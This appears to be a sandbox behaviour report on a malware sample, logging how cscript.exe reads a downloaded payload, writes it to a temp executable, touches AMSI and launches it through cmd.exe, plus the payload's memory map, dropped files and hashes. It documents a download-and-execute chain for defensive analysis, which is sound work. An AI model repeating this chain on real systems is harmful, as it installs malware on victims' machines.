COM	Create	interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cscript.exe, file_name_orig = C:\Windows\System32\CScript.exe, size = 261	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cscript.exe, base_address = 0x7ff770f20000	1	Fn
Module	Get Address	module_name = c:\windows\system32\cscript.exe, function = 1, address_out = 0x7ff770f21350	1	Fn
Inet	Read Response	size_out = 159535	1	Fn Data
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\vwOrbzLbc.exe	1	Fn
File	Write	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\vwOrbzLbc.exe, size = 159535	1	Fn Data
Module	Load	module_name = shell32.dll, base_address = 0x7ffb3aa50000	1	Fn
Module	Get Address	module_name = c:\windows\system32\shell32.dll, function = ShellExecuteExW, address_out = 0x7ffb3ab32460	1	Fn
Process	Create	process_name = cmd.exe, show_window = SW_SHOWNORMAL	1	Fn
System	Sleep	duration = -1 (infinite)	1	Fn
Module	Get Address	module_name = c:\windows\system32\amsi.dll, function = AmsiUninitialize, address_out = 0x7ffb30da2490	1	Fn

Thread 0xee4

(Host: 1, Network: 0)

Category	Operation	Information	Success	Count	Logfile
Window	Create	class_name = WSH-Timer, wndproc_parameter = 843568864240		1	Fn

Process #3: cmd.exe

(Host: 56, Network: 0)

Information	Value
ID	#3
File Name	c:\windows\system32\cmd.exe
Command Line	"C:\Windows\System32\cmd.exe" /c call "C:\Users\CIIHMN~1\AppData\Local\Temp\vwOrbzLbc.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:00:24, Reason: Child Process
Unmonitor	End Time: 00:05:23, Reason: Terminated by Timeout
Monitor Duration	00:04:59

OS Process Information

Information	Value
PID	0xf8c
Parent PID	0xe98 (c:\windows\system32\cscript.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	LHNIWSJ\CIiHmnxMn6Ps
Groups	LHNIWSJ\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Local account and member of Administrators group (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, OWNER) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Local account (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:00013d92 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x F90 0x FA8

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions Download Dump
private_0x0000004bba090000	0x4bba090000	0x4bba0affff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000004bba090000	0x4bba090000	0x4bba09ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000004bba0a0000	0x4bba0a0000	0x4bba0a6fff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000004bba0b0000	0x4bba0b0000	0x4bba0c3fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000004bba0d0000	0x4bba0d0000	0x4bba1cffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000004bba1d0000	0x4bba1d0000	0x4bba1d3fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000004bba1e0000	0x4bba1e0000	0x4bba1e0fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000004bba1f0000	0x4bba1f0000	0x4bba1f1fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000004bba200000	0x4bba200000	0x4bba206fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000004bba220000	0x4bba220000	0x4bba31ffff	Private Memory	Readable, Writable	Region Actions Download Dump
locale.nls	0x4bba320000	0x4bba3ddfff	Memory Mapped File	Readable	Region Actions
private_0x0000004bba3e0000	0x4bba3e0000	0x4bba4dffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000004bba5f0000	0x4bba5f0000	0x4bba5fffff	Private Memory	Readable, Writable	Region Actions Download Dump
sortdefault.nls	0x4bba600000	0x4bba936fff	Memory Mapped File	Readable	Region Actions
pagefile_0x00007df5ff7b0000	0x7df5ff7b0000	0x7ff5ff7affff	Pagefile Backed Memory	-	Region Actions
sysmain.sdb	0x7ff6ddf00000	0x7ff6de28ffff	Memory Mapped File	Readable	Region Actions
pagefile_0x00007ff6de290000	0x7ff6de290000	0x7ff6de38ffff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00007ff6de390000	0x7ff6de390000	0x7ff6de3b2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00007ff6de3b8000	0x7ff6de3b8000	0x7ff6de3b8fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00007ff6de3bc000	0x7ff6de3bc000	0x7ff6de3bdfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00007ff6de3be000	0x7ff6de3be000	0x7ff6de3bffff	Private Memory	Readable, Writable	Region Actions Download Dump
cmd.exe	0x7ff6decd0000	0x7ff6ded28fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apphelp.dll	0x7ffb38570000	0x7ffb385e7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x7ffb3a800000	0x7ffb3a9dcfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x7ffb3cf10000	0x7ffb3cfacfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x7ffb3d260000	0x7ffb3d30cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x7ffb3d310000	0x7ffb3d4d1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions

Threads

Thread 0xf90

(Host: 51, Network: 0)

Category	Operation	Information	Count	Logfile
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x7ff6decd0000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x7ffb3d260000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x7ffb3d27d550	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	3	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
Environment	Get Environment String	-	2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT	1	Fn
Environment	Set Environment String	name = PROMPT, value = $P$G	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Windows\system32, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32, type = file_attributes	1	Fn
Environment	Set Environment String	name = =C:, value = C:\Windows\System32	1	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x7ffb3d260000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x7ffb3d2825e0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x7ffb3d281f90	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x7ffb3a853a10	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
File	Get Info	filename = "C:\Users\CIIHMN~1\AppData\Local\Temp\vwOrbzLbc.exe", type = file_attributes	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Users\CIIHMN~1\AppData\Local\Temp\vwOrbzLbc.exe, os_pid = 0xfac, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Set Environment String	name = =ExitCode, value = 00000000	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Set Environment String	name = =ExitCodeAscii	1	Fn
Environment	Get Environment String	-	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn

Process #5: vworbzlbc.exe

(Host: 380, Network: 0)

Information	Value
ID	#5
File Name	c:\users\ciihmn~1\appdata\local\temp\vworbzlbc.exe
Command Line	"C:\Users\CIIHMN~1\AppData\Local\Temp\vwOrbzLbc.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:00:25, Reason: Child Process
Unmonitor	End Time: 00:05:23, Reason: Terminated by Timeout
Monitor Duration	00:04:58

OS Process Information

Information	Value
PID	0xfac
Parent PID	0xf8c (c:\windows\system32\cmd.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	LHNIWSJ\CIiHmnxMn6Ps
Groups	LHNIWSJ\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Local account and member of Administrators group (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, OWNER) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Local account (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:00013d92 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x FB0 0x FB4 0x FC4 0x FC8

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000020000	0x00020000	0x00023fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000030000	0x00030000	0x00030fff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000040000	0x00040000	0x00053fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000060000	0x00060000	0x0009ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000000a0000	0x000a0000	0x0019ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x00000000001a0000	0x001a0000	0x001a3fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000001b0000	0x001b0000	0x001b1fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000001c0000	0x001c0000	0x001c1fff	Private Memory	Readable, Writable	Region Actions Download Dump
locale.nls	0x001d0000	0x0028dfff	Memory Mapped File	Readable	Region Actions
private_0x0000000000290000	0x00290000	0x002cffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000002d0000	0x002d0000	0x002d0fff	Private Memory	Readable, Writable	Region Actions Download Dump
oleaccrc.dll	0x002e0000	0x002e1fff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000002f0000	0x002f0000	0x002f1fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000300000	0x00300000	0x00303fff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000310000	0x00310000	0x00310fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000320000	0x00320000	0x00320fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000330000	0x00330000	0x00330fff	Pagefile Backed Memory	Readable	Region Actions
cversions.1.db	0x00340000	0x00343fff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000000340000	0x00340000	0x00342fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000340000	0x00340000	0x0034dfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000350000	0x00350000	0x0035ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000360000	0x00360000	0x00360fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000370000	0x00370000	0x0037ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000380000	0x00380000	0x003bffff	Private Memory	Readable, Writable	Region Actions Download Dump
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000012.db	0x003c0000	0x003e1fff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000003f0000	0x003f0000	0x003fefff	Pagefile Backed Memory	Readable, Writable, Executable	Region Actions
vworbzlbc.exe	0x00400000	0x0043bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000440000	0x00440000	0x0053ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000540000	0x00540000	0x0057ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000590000	0x00590000	0x0068ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000690000	0x00690000	0x00817fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000820000	0x00820000	0x009a0fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000009b0000	0x009b0000	0x01daffff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000001db0000	0x01db0000	0x01edffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001db0000	0x01db0000	0x01eaffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000001eb0000	0x01eb0000	0x01ec1fff	Pagefile Backed Memory	Readable, Writable, Executable	Region Actions
private_0x0000000001ed0000	0x01ed0000	0x01edffff	Private Memory	Readable, Writable	Region Actions Download Dump
sortdefault.nls	0x01ee0000	0x02216fff	Memory Mapped File	Readable	Region Actions
private_0x0000000002220000	0x02220000	0x02a2afff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000002a30000	0x02a30000	0x02b2ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000002b30000	0x02b30000	0x08a8ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000008a90000	0x08a90000	0x08c06fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000008c10000	0x08c10000	0x08d88fff	Private Memory	Readable, Writable	Region Actions Download Dump
system.dll	0x10000000	0x10005fff	Memory Mapped File	Readable, Writable, Executable	Region Actions Download Dump
wow64cpu.dll	0x5c9f0000	0x5c9f7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64win.dll	0x5ca00000	0x5ca72fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64.dll	0x5ca80000	0x5cacefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rsaenh.dll	0x73200000	0x7322efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptsp.dll	0x73230000	0x73242fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shfolder.dll	0x73250000	0x73255fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleacc.dll	0x73260000	0x732b2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
propsys.dll	0x732c0000	0x73401fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
bcrypt.dll	0x736e0000	0x736fafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
userenv.dll	0x73700000	0x73718fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
comctl32.dll	0x738f0000	0x73af8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
version.dll	0x73d50000	0x73d57fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
dwmapi.dll	0x740f0000	0x7410cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
uxtheme.dll	0x74110000	0x74184fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apphelp.dll	0x74190000	0x74220fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
bcryptprimitives.dll	0x74230000	0x74288fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x74290000	0x74299fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x742a0000	0x742bdfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
clbcatq.dll	0x742c0000	0x74341fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
setupapi.dll	0x74350000	0x744f4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x74500000	0x7463ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x74640000	0x74729fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x74730000	0x7475afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shell32.dll	0x74760000	0x75b1efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x75b80000	0x75c3dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
powrprof.dll	0x75c40000	0x75c83fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x75d40000	0x75dbafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x75dc0000	0x75e03fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x75e70000	0x75f1bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x75f20000	0x76095fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x760a0000	0x760e2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shcore.dll	0x76280000	0x7630cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleaut32.dll	0x763b0000	0x76441fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
windows.storage.dll	0x764d0000	0x769acfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x769b0000	0x76afcfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x76bc0000	0x76caffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cfgmgr32.dll	0x76cb0000	0x76ce5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
combase.dll	0x76cf0000	0x76ea9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel.appcore.dll	0x76eb0000	0x76ebbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
profapi.dll	0x77050000	0x7705efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x77070000	0x7718ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77190000	0x77308fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x000000007fead000	0x7fead000	0x7feaffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x000000007feb0000	0x7feb0000	0x7ffaffff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007ffd5000	0x7ffd5000	0x7ffd7fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffd8000	0x7ffd8000	0x7ffdafff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdb000	0x7ffdb000	0x7ffddfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions Download Dump
private_0x000000007fff0000	0x7fff0000	0x7ffb3d30ffff	Private Memory	Readable	Region Actions
ntdll.dll	0x7ffb3d310000	0x7ffb3d4d1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x00007ffb3d4d2000	0x7ffb3d4d2000	0x7ffffffeffff	Private Memory	Readable	Region Actions

Created Files

Filename	File Size	Hash Values	Actions
c:\users\ciihmn~1\appdata\local\temp\nsga12c.tmp	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\users\ciihmn~1\appdata\local\temp\nsga12d.tmp	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\users\ciihmn~1\appdata\local\temp\nsma14e.tmp	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\users\ciihmn~1\appdata\local\temp\nsma14e.tmp\system.dll	11.00 KB (11264 bytes)	MD5: 3f176d1ee13b0d7d6bd92e1c7a0b9bae SHA1: fe582246792774c2c9dd15639ffa0aca90d6fd0b SHA256: fa4ab1d6f79fd677433a31ada7806373a789d34328da46ccb0449bbf347bd73e	File Actions Show Properties Download
c:\users\ciihmn~1\appdata\local\temp\w8nb	69.88 KB (71559 bytes)	MD5: 5a028c895aaed43a1f4f16e880f83ad1 SHA1: 4cc8b9e59434eae65374a5b790ec98fbab713871 SHA256: abed74c65d9b1562c2c9a10f35965d62f251742762cf28ca5dbd7813a9428db4	File Actions Show Properties Download

Modified Files

Filename	File Size	Hash Values	Actions
c:\users\ciihmnxmn6ps\videos\desktop.ini	1.42 KB (1456 bytes)	MD5: bd3d4d5eb25d64e78a8dc21a5b0ce4c8 SHA1: 5a860bd27a305d6e6af9b8d406836bcdbd0c3d46 SHA256: 874beff6a5c1aa61d7c49a25dc23a22eb7b0aecf5cb5b45b455afb0f9d8b52f9	File Actions Show Properties Download
c:\users\ciihmnxmn6ps\pictures\desktop.ini	1.42 KB (1456 bytes)	MD5: 3dbf9c15339199ca1e20853ace4b31d4 SHA1: c9b06d0f911c553a516f1e3066fcd1f3af08a473 SHA256: 4d8b6c410fde466c6a91419bd42ff117b20a0142ecbf655f2b5c7e18e2b30157	File Actions Show Properties Download
c:\users\ciihmnxmn6ps\onedrive\desktop.ini	1.03 KB (1056 bytes)	MD5: 0072fd5678c831e896556403c9a56dc5 SHA1: e5f5c7cf7b6d6e5ae349dfb6fb2f02f95130a79c SHA256: cc05acaabf026ed6bcd29908ae5079735617583855e4fd6557d8e310154af02e	File Actions Show Properties Download
c:\users\ciihmnxmn6ps\music\desktop.ini	1.42 KB (1456 bytes)	MD5: c97099a5ebbc80d50d309d865880682c SHA1: 4ca5f47e27d62693879f719b542b2904b0563b56 SHA256: ad3c0c99182392975db23272978191ff9571c70e703c03a405338a777fc58be2	File Actions Show Properties Download
c:\users\ciihmnxmn6ps\downloads\desktop.ini	1.20 KB (1232 bytes)	MD5: a366561c12c6f69711d3bb85e052fa7d SHA1: c70b3c04a93e561b4cf463ac44d10923da75566f SHA256: b1422698d4c21483ab1bd86344784727cad570b0b0b1eeaef1f221496e685910	File Actions Show Properties Download
c:\users\ciihmnxmn6ps\documents\desktop.ini	1.33 KB (1360 bytes)	MD5: 7132d3a594fda47d039273bbc40dbffd SHA1: 860a7d33a834d69fcc947226d561d6ca7c1440bb SHA256: b9b2bd048b7ee2b23a488b39c36a49d1a453087428ae56f7f43624b1658624bc	File Actions Show Properties Download
c:\users\ciihmnxmn6ps\desktop\desktop.ini	1.20 KB (1232 bytes)	MD5: 1303831f18dffd4cf7f31ee7c7682dc9 SHA1: af7733df345ddf40bce6ff8799b0ebbfd06c2e62 SHA256: 032970cd060cdf8c701de88534b813f7b69277ce8ae5be1f12f8363b387bcfe7	File Actions Show Properties Download

Threads

Thread 0xfb0

(Host: 292, Network: 0)

Category	Operation	Information	Count	Logfile
System	Get Info	type = Operating System	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0x76050790	1	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Module	Load	module_name = C:\Windows\system32\UXTHEME.dll, base_address = 0x74110000	1	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Module	Load	module_name = C:\Windows\system32\USERENV.dll, base_address = 0x73700000	1	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Module	Load	module_name = C:\Windows\system32\SETUPAPI.dll, base_address = 0x74350000	1	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Module	Load	module_name = C:\Windows\system32\APPHELP.dll, base_address = 0x74190000	1	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
